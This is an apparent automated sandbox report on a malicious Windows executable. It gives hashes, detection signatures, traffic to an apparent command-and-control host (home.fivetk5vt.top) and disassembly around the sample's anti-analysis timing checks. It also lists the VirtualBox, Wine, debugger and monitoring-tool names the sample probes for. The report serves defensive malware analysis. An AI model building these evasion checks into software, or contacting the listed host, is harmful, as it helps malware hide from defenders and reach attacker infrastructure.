Windows Analysis Report
j6Nv9kUydV.exe

Overview

General Information

Sample name: j6Nv9kUydV.exe (renamed because original name is a hash value)
Original sample name: 84e0e622857460da96501532a233c862.exe
Analysis ID: 1578975
MD5: 84e0e622857460da96501532a233c862
SHA1: a83b246ef32b7a66a8cbbc54edd3bb667f956b9b
SHA256: 0924a04e22be1339356c24b69b2e75516c56b0b23aa500e9068b9c28c54dd5b9
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • j6Nv9kUydV.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\j6Nv9kUydV.exe" MD5: 84E0E622857460DA96501532A233C862)
    • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: j6Nv9kUydV.exeAvira: detected
Source: j6Nv9kUydV.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: j6Nv9kUydV.exeJoe Sandbox ML: detected
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ad892dbe-f
Source: j6Nv9kUydV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5vt.top
Source: unknownHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmp, j6Nv9kUydV.exe, 00000000.00000002.1740716394.00000000018AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: .idata
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
Source: j6Nv9kUydV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: j6Nv9kUydV.exeStatic PE information: Section: zqcjcxyz ZLIB complexity 0.9944025632999444
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8120
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\cb3c52ec-c800-4012-b4d4-68c6d5d79963
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: j6Nv9kUydV.exeReversingLabs: Detection: 65%
Source: j6Nv9kUydV.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\j6Nv9kUydV.exe "C:\Users\user\Desktop\j6Nv9kUydV.exe"
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: windowscodecs.dll
Source: j6Nv9kUydV.exeStatic file information: File size 4495360 > 1048576
Source: j6Nv9kUydV.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284800
Source: j6Nv9kUydV.exeStatic PE information: Raw size of zqcjcxyz is bigger than: 0x100000 < 0x1c1400

Data Obfuscation

Source: C:\Users\user\Desktop\j6Nv9kUydV.exeUnpacked PE file: 0.2.j6Nv9kUydV.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zqcjcxyz:EW;eomoelfg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zqcjcxyz:EW;eomoelfg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: j6Nv9kUydV.exeStatic PE information: real checksum: 0x455395 should be: 0x453696
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: .idata
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: zqcjcxyz
Source: j6Nv9kUydV.exeStatic PE information: section name: eomoelfg
Source: j6Nv9kUydV.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeCode function: 0_2_070E0761 push edi; retf 0_2_070E0723
Source: j6Nv9kUydV.exeStatic PE information: section name: zqcjcxyz entropy: 7.95599128870457

Boot Survival

Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeWindow searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F61476 second address: F61480 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBCC4EB33A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6240D second address: F62417 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F630A2 second address: F63105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 movsx ebx, dx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBCC4EB33A8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 or di, 8547h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FBCC4EB33A8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D25ADh], edx 0x0000004f push eax 0x00000050 jnp 00007FBCC4EB33B4h 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F62417 second address: F6242F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64EBC second address: F64EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64EC8 second address: F64ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F675DD second address: F675EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F675EA second address: F67632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FBCC4DE8CC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov edi, eax 0x00000024 push 00000000h 0x00000026 add ebx, 3B924D65h 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f movsx esi, ax 0x00000032 sub dword ptr [ebp+1247D4F1h], ecx 0x00000038 popad 0x00000039 sbb bx, D02Ah 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F67632 second address: F67637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6410E second address: F64113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64113 second address: F64119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F64119 second address: F64129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F651B0 second address: F651D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCC4EB33B8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F68797 second address: F687BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FBCC4DE8CD0h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6A824 second address: F6A834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F687BC second address: F68853 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub bl, 00000058h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 pop ebx 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FBCC4DE8CC8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov bh, dl 0x00000036 mov eax, dword ptr [ebp+122D0CD5h] 0x0000003c mov edi, dword ptr [ebp+122D3982h] 0x00000042 stc 0x00000043 push FFFFFFFFh 0x00000045 mov edi, dword ptr [ebp+1247EED4h] 0x0000004b nop 0x0000004c jc 00007FBCC4DE8CE5h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007FBCC4DE8CD5h 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F68853 second address: F68858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6A834 second address: F6A89F instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FBCC4DE8CC8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 pushad 0x0000002a mov eax, dword ptr [ebp+122D37DEh] 0x00000030 mov si, 4492h 0x00000034 popad 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+122D24C4h], eax 0x0000003d push 00000000h 0x0000003f mov edi, edx 0x00000041 xchg eax, esi 0x00000042 jmp 00007FBCC4DE8CD9h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FBCC4DE8CC6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F69930 second address: F6993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6993C second address: F69940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6B860 second address: F6B86A instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4EB33ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F6EF60 second address: F6EF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F751DD second address: F751E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F751E3 second address: F7521D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBCC4DE8CD9h 0x0000000e jmp 00007FBCC4DE8CD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7521D second address: F7523A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F748F0 second address: F748FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F748FD second address: F74901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74901 second address: F74922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBCC4DE8CD9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74922 second address: F74927 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74927 second address: F7492D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7492D second address: F74933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A7D second address: F74A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A83 second address: F74A94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jng 00007FBCC4EB33A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74A94 second address: F74AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007FBCC4DE8CD2h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74C23 second address: F74C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCC4EB33A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F74C2F second address: F74C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F469 second address: F7F474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
